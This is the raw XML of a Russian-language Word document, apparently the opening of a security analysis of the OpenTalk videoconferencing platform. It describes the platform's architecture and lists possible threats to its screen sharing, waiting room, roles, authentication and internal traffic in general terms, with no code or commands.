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32F0" w14:textId="10777EDA" w:rsidR="00FC1BF5" w:rsidRDefault="000414A5" w:rsidP="00BE2FBB">
      <w:pPr>
        <w:pStyle w:val="110"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Архитектура и первоначальный анализ ПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B98BC9" w14:textId="47FAB96F" w:rsidR="005B556E" w:rsidRDefault="000414A5" w:rsidP="00355459">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
      <w:r>
        <w:t>Архитектура и функции ПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7791D0" w14:textId="4B4F3E18" w:rsidR="000414A5" w:rsidRPr="00A45F6D" w:rsidRDefault="000414A5" w:rsidP="000414A5">
      <w:pPr>
        <w:pStyle w:val="130"/>
      </w:pPr>
      <w:r>
        <w:t>Назначение и основные функции ПО «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E7A78">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0119F04B" w14:textId="69E5DA5D" w:rsidR="00CA1960" w:rsidRPr="00CA1960" w:rsidRDefault="004B22D3" w:rsidP="000414A5">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> программно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> обеспечение с открытым исходным кодом, позиционирующее себя как безопасное и масштабируемое решение для видеоконференцсвязи, разработанное компанией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Heinlein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> с акцентом на</w:t>
      </w:r>
      <w:r w:rsidR="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> приватность и защиту данных</w:t>
      </w:r>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Серверная часть реализована на языке программирования </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Rust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, а развёртывание осуществляется</w:t>
      </w:r>
      <w:r w:rsidR="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>посредством контейнеризации</w:t>
      </w:r>
      <w:r w:rsidR="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>на базе</w:t>
      </w:r>
      <w:r w:rsidR="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A049B4" w:rsidRPr="00A049B4">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556B07F" w14:textId="77777777" w:rsidR="007C1702" w:rsidRDefault="00FA476B" w:rsidP="007C1702">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Функционал</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1702">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05346D6D" w14:textId="047987AD" w:rsidR="00D80616" w:rsidRDefault="00CA1960" w:rsidP="007C1702">
      <w:pPr>
        <w:pStyle w:val="111"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA1960">
        <w:t>Видеоконференция</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00873ECD">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>основной и критичный с точки зрения безопасности функционал программного обеспечения, проведение аудио и видео конференций.</w:t>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="00CA1960">
        <w:t xml:space="preserve"> Включает демонстрацию экрана, чат, ролевую модель участников и механизмы контроля доступа в комнату</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F85332" w14:textId="07F60BEE" w:rsidR="00733A97" w:rsidRDefault="00BD5A2D" w:rsidP="00B45C21">
      <w:pPr>
        <w:pStyle w:val="111"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t>емонстрация экрана</w:t>
      </w:r>
      <w:r w:rsidR="00873ECD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t>при некорректных проверках злоумышленник может получить удаленный доступ к экрану, что приводит к раскрытию информации</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5A2D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255946CB" w14:textId="10453578" w:rsidR="00733A97" w:rsidRDefault="00BD5A2D" w:rsidP="00BD5A2D">
      <w:pPr>
        <w:pStyle w:val="1f3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t xml:space="preserve">омната </w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:t>ожидания</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A" w:rsidRPr="00C75D4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Waiting</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A" w:rsidRPr="00C75D4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>room</w:t>
      </w:r>
      <w:r w:rsidR="008D0061" w:rsidRPr="00C75D4A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008D0061">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008D0061" w:rsidRPr="00733A97">
        <w:t>при</w:t>
      </w:r>
      <w:r w:rsidR="00873ECD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t>помощи бесконтрольных массовых запросах</w:t>
      </w:r>
      <w:r w:rsidR="00733A97" w:rsidRPr="00733A97">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D0061" w:rsidRPr="004A7A62">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidR="00733A97" w:rsidRPr="00733A97">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t>-атаки</w:t>
      </w:r>
      <w:r w:rsidR="003A5828" w:rsidRPr="00495F80">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="003A5828" w:rsidRPr="008D0061">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t xml:space="preserve"> можно вызвать перегрузку очереди ожидания и всей </w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:t>комнаты</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5A2D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C597C1" w14:textId="7FAC4F93" w:rsidR="00733A97" w:rsidRDefault="00BD5A2D" w:rsidP="00BD5A2D">
      <w:pPr>
        <w:pStyle w:val="1f3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t>олевая модель</w:t>
      </w:r>
      <w:r w:rsidR="00873ECD">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t xml:space="preserve"> в комнатах</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733A97">
        <w:t>присутствует разграничение участников</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:t xml:space="preserve"> при несанкционированном получении прав модератора злоумышленник фактически управляет конференцией</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5A2D">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684AC0B3" w14:textId="0715A39D" w:rsidR="00C75D4A" w:rsidRPr="00733A97" w:rsidRDefault="00BD5A2D" w:rsidP="00BD5A2D">
      <w:pPr>
        <w:pStyle w:val="1f3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A" w:rsidRPr="00C75D4A">
        <w:t xml:space="preserve">онфиденциальная комната </w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A" w:rsidRPr="00733A97">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>room</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A" w:rsidRPr="00733A97">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meeting</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A" w:rsidRPr="00733A97">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00873ECD">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:t xml:space="preserve"> в комнате присутствует технология приватного звонка (один на один</w:t>
      </w:r>
      <w:r w:rsidR="008D0061">
        <w:t>), при</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:t xml:space="preserve"> слабой защите </w:t>
      </w:r>
      <w:r w:rsidR="00EF7982">
        <w:t>злоумышленник компрометирует</w:t>
      </w:r>
      <w:r w:rsidR="00C75D4A">
        <w:t xml:space="preserve"> личные данные. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF239E8" w14:textId="39B1D3D1" w:rsidR="00D95B58" w:rsidRPr="00EF7982" w:rsidRDefault="00733A97" w:rsidP="00D80616">
      <w:pPr>
        <w:pStyle w:val="111"/>
      </w:pPr>
      <w:r w:rsidRPr="00733A97">
        <w:t>Авторизация и аутентификация</w:t>
      </w:r>
      <w:r w:rsidR="00EF7982">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A5828">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00EF7982">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t xml:space="preserve">вход в аккаунт пользователя работает через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D80616">
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D80616">
        <w:t xml:space="preserve"> по протоколу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D80616" w:rsidRPr="00EF7982">
        <w:t>OpenID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D80616" w:rsidRPr="00EF7982">
        <w:t xml:space="preserve"> Connect (OIDC)</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="007501CB">
        <w:t xml:space="preserve">От корректности реализации этого механизма напрямую зависит безопасность </w:t>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="007501CB">
        <w:lastRenderedPageBreak/>
        <w:t>всей системы</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>. Без должной проверки и обновления токена злоумышленник может подделать токен (использование токена другого клиента) или использовать токен с предыдущей сессии, а также произвести перехват токена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F821ACC" w14:textId="74CF2825" w:rsidR="00873ECD" w:rsidRPr="00FA476B" w:rsidRDefault="00EF7982" w:rsidP="00D80616">
      <w:pPr>
        <w:pStyle w:val="111"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF7982">
        <w:t>Передача и хранение информации</w:t>
      </w:r>
      <w:r w:rsidRPr="00D95B58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00873ECD">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00D95B58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t xml:space="preserve">данные работают по нескольким каналам и каждый компонент программного обеспечения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D80616">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D80616" w:rsidRPr="002A383D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="004B293D">
        <w:t>слушает собственный порт</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D80616" w:rsidRPr="00BB3E15">
        <w:t>Особую роль здесь играет шифрование передаваемых данных. Компоненты внутри сервера могут не шифроваться, что позволяет злоумышленнику получить доступ к защищённой информации при подключении к внутренней сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE15E38" w14:textId="44A1FD78" w:rsidR="006B132D" w:rsidRDefault="00373010" w:rsidP="00373010">
      <w:pPr>
        <w:pStyle w:val="130"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Архитектура ПО «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48434A59" w14:textId="1917A136" w:rsidR="00A45F6D" w:rsidRPr="00267D35" w:rsidRDefault="003A5828" w:rsidP="00A45F6D">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B22D3" w:rsidRPr="004B22D3">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">– платформа </w:t>
      </w:r>
      <w:r w:rsidR="001074BB">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>видеоконференции (а</w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">налог </w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>ZOOM</w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D" w:rsidRPr="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, построенная на системе контейнеров </w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, объединённых локальной сетью</w:t>
      </w:r>
      <w:r w:rsidR="00433FB8">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рисунок</w:t>
      </w:r>
      <w:r w:rsidR="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00433FB8">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00433FB8">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF  _Ref234277735 \h \r \t \w  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="00433FB8">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00433FB8">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00433FB8">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidR="00433FB8">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00433FB8">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001B7E9E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00495F80" w:rsidRPr="00495F80">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00495F80" w:rsidRPr="007B45E5">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Основные функциональные компоненты ПО представлены в </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00495F80">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495F80">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234278114 \r \h \</w:instrText>
      </w:r>
      <w:r w:rsidR="00495F80">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r w:rsidR="00495F80">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00495F80">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>таблице</w:t>
      </w:r>
      <w:r w:rsidR="00495F80">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.1</w:t>
      </w:r>
      <w:r w:rsidR="00495F80">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00495F80">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Доступ к контейнерам производится через обратный прокси-сервер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, что </w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">обеспечивает </w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">обработку большого количества соединений за </w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>короткий</w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> промежуток времени и </w:t>
      </w:r>
      <w:r w:rsidR="00267D35" w:rsidRPr="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">скрывает внутреннюю </w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>архитектур</w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidR="00A45F6D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> программного обеспечения</w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пользователь и </w:t>
      </w:r>
      <w:r w:rsidR="00267D35" w:rsidRPr="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>администратор</w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> взаимодействует с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00267D35" w:rsidRPr="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>через</w:t>
      </w:r>
      <w:r w:rsidR="00267D35" w:rsidRPr="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
